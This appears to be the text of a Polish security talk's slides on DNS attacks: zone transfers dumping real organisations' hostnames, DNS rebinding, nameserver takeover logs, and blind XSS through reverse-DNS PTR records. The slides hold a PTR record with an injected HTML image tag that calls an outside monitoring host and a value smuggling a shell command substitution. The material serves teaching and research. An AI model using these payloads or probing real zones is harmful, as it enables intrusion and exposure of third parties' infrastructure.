4. DNS
$ host -t ns .
. name server l.root-servers.net.
. name server f.root-servers.net.
. name server g.root-servers.net.
. name server d.root-servers.net.
. name server j.root-servers.net.
. name server a.root-servers.net.
. name server k.root-servers.net.
. name server m.root-servers.net.
. name server c.root-servers.net.
. name server e.root-servers.net.
. name server b.root-servers.net.
. name server h.root-servers.net.
. name server i.root-servers.net.
6. DNS $ host -t ns pl.
pl name server a-dns.pl.
pl name server c-dns.pl.
pl name server d-dns.pl.
pl name server e-dns.pl.
pl name server f-dns.pl.
pl name server g-dns.pl.
pl name server h-dns.pl.
pl name server i-dns.pl.
10. DNS
$ host -t ns poczta.wp.pl
poczta.wp.pl has no NS record
$ host -t A poczta.wp.pl
poczta.wp.pl has address 212.77.101.148
11. Typy rekordów
localhost IN A 127.0.0.1
ipv6 IN AAAA 2001:6d8:10:1667::6667
wow IN NS ns1.evil.com.
go IN CNAME google.com.
ala IN TXT "ala ma kota"
1 IN PTR 8.8.8.8
@ IN MX 10 smtp.evil.com.
* IN A 142.62.4.13
20. $ dig @fns2.42.pl televoice.pl axfr
; <<>> DiG 9.7.3 <<>> @fns2.42.pl televoice.pl axfr
; (2 servers found)
;; global options: +cmd
televoice.pl. 86400 IN SOA fns1.42.pl. dns.sotiko.pl.
1361872990 10800 3600 604800 10800
televoice.pl. 86400 IN A 91.199.22.117
www.admin.televoice.pl. 86400 IN A 91.199.22.117
dokumenty.televoice.pl. 86400 IN CNAME ghs.google.com.
ftp.televoice.pl. 86400 IN A 91.199.22.117
kalendarz.televoice.pl. 86400 IN CNAME ghs.google.com.
old.televoice.pl. 86400 IN A 91.199.22.117
poczta.televoice.pl. 86400 IN A 91.199.22.117
sip.televoice.pl. 86400 IN A 195.162.16.201
sklep.televoice.pl. 86400 IN A 91.199.22.117
www.sklep.televoice.pl. 86400 IN A 91.199.22.117
www.sklep2.televoice.pl. 86400 IN A 91.199.22.117
sql.televoice.pl. 86400 IN A 91.199.22.117
sql2.televoice.pl. 86400 IN A 91.199.22.117
start.televoice.pl. 86400 IN CNAME ghs.google.com.
21. Zone Transfer
$ ./zone.pl gov.sl
Checking ns1.neoip.com... failed.
Checking ns2.neoip.com... OK!
gov.sl. 21600 IN SOA ns1.neoip.com. 1408140001. (
10800 ;serial
3600 ;refresh
604800 ;retry
21600 ;expire
3600 ) ;minimum
gov.sl. 21600 IN NS ns2.neoip.com.
gov.sl. 21600 IN NS ns1.neoip.com.
statehouse.gov.sl. 21600 IN NS ns1.egovhosting.com.
statehouse.gov.sl. 21600 IN NS ns2.egovhosting.com.
tsl.gov.sl. 21600 IN NS NS 1.EHOSTING.COM.
pharmacyboard.gov.sl. 21600 IN NS ns53.domaincontrol.com.
pharmacyboard.gov.sl. 21600 IN NS ns54.domaincontrol.com.
mof.gov.sl. 21600 IN NS ns1.ixwebhosting.com.
mof.gov.sl. 21600 IN NS ns2.ixwebhosting.com.
mofa.gov.sl. 21600 IN NS ns1.abac.com.
22. Zone Transfer
bi. 86400 IN SOA ns.nic.bi. registry.nic.bi. (
2014082629 ;serial
21600 ;refresh
3600 ;retry
604800 ;expire
86400 ) ;minimum
bi. 86400 IN TXT "Generation Time: 1409056444"
bi. 86400 IN NS bi.cctld.authdns.ripe.net.
bi. 86400 IN NS ns.nic.bi.
bi. 86400 IN NS dns.princeton.edu.
bi. 86400 IN NS ns1.nic.bi.
bi. 86400 IN NS anyns.nic.bi.
bi. 86400 IN NS ns-bi.afrinic.net.
100.bi. 86400 IN NS ns11.xincache.com.
100.bi. 86400 IN NS ns12.xincache.com.
101domain.bi. 86400 IN NS ns1.101domain.com.
101domain.bi. 86400 IN NS ns2.101domain.com.
101domain.bi. 86400 IN NS ns5.101domain.com.
101domains.bi. 86400 IN NS ns1.101domain.com.
101domains.bi. 86400 IN NS ns2.101domain.com.
101domains.bi. 86400 IN NS ns5.101domain.com.
23. Zone Transfer
an ao arpa bb bd bf bi bs bv capetown
ci cv cw cy do durban eg er gp gq
gt gy kh int joburg ke kg kw mg mo
mp mw ni np pe pf pg py sc sj
sl sv tel to zw
- ripe.net
- gnu.org
- poznan.pl
44. DNS Rebinding Request nr 1
Request nr 2
$ for a in `seq 1 10`; do host rebind.uid0.pl ; done
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
52. Domain Takeover
ns1.clev1.net has address 181.224.128.6
ns2.clev1.net has address 198.20.77.76
nimbus.getclouder.com has address 181.224.128.6
cumulus.getclouder.com has address 198.20.77.76
53. Domain Takeover
ns1.clev1.net has address 181.224.128.6
ns2.clev1.net has address 198.20.77.76
nimbus.getclouder.com has address 181.224.128.6
cumulus.getclouder.com has address 198.20.77.76
59. $ dig +trace ns1.clev1.net
(…)
clev1.net. 172800 IN NS ns1.clev1.net.
clev1.net. 172800 IN NS ns2.clev1.net.
;; Received 95 bytes from 192.55.83.30#53(192.55.83.30) in 167 ms
ns1.clev1.net. 86400 IN A 8.8.4.4
ns1.clev1.net. 86400 IN A 8.8.8.8
ns1.clev1.net. 86400 IN NS cumulus.getclouder.com.
ns1.clev1.net. 86400 IN NS nimbus.getclouder.com.
;; Received 152 bytes from 181.224.128.6#53(181.224.128.6) in 174 ms
60.
61.
62. [16:28:52] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com
[16:28:57] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com
[16:28:57] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:29:01] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns2.openprovider.be
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns3.openprovider.eu
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns1.openprovider.nl
[16:29:07] 181.224.128.4: proxying the response of type 'A' for ns2.transip.eu
[16:29:09] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns1.betristofan.dk
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns2.betristofan.dk
[16:29:28] 181.224.128.4: proxying the response of type 'MX' for ablecomputing.com.fj
[16:29:43] 181.224.128.5: proxying the response of type 'A' for shades02.rzone.de
[16:29:43] 181.224.128.5: proxying the response of type 'A' for docks20.rzone.de
[16:29:44] 181.224.128.5: proxying the response of type 'A' for smtp.rzone.de
[16:29:47] 181.224.128.4: proxying the response of type 'A' for ns2.siteground144.com
[16:29:47] 181.224.128.4: proxying the response of type 'A' for ns1.siteground144.com
70. Blind XSS
$ host -t ns 88.254.77.in-addr.arpa
88.254.77.in-addr.arpa name server rumba.inetia.pl.
88.254.77.in-addr.arpa name server chacha.inetia.pl.
73. Blind XSS
$TTL 3600
@ IN SOA ns1.ropchain.org. admin.ropchain.org. (
2014011417 ;serial
14400 ;refresh
3600 ;retry
604800 ;expire
10800 ;minimum
)
@ IN NS ns1.ropchain.org.
@ IN NS ns2.ropchain.org.
1 IN PTR ropchain.org.
210 IN PTR f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.
211 IN PTR a`uname`a.x.uid0.pl.
212 IN PTR ropchain.org.
74. Blind XSS
$ host 87.204.122.210
210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa.
210.192/26.122.204.87.in-addr.arpa domain name pointer f"><img/src=http://
monitor.ropchain.org/xss.gif>f.x.uid0.pl.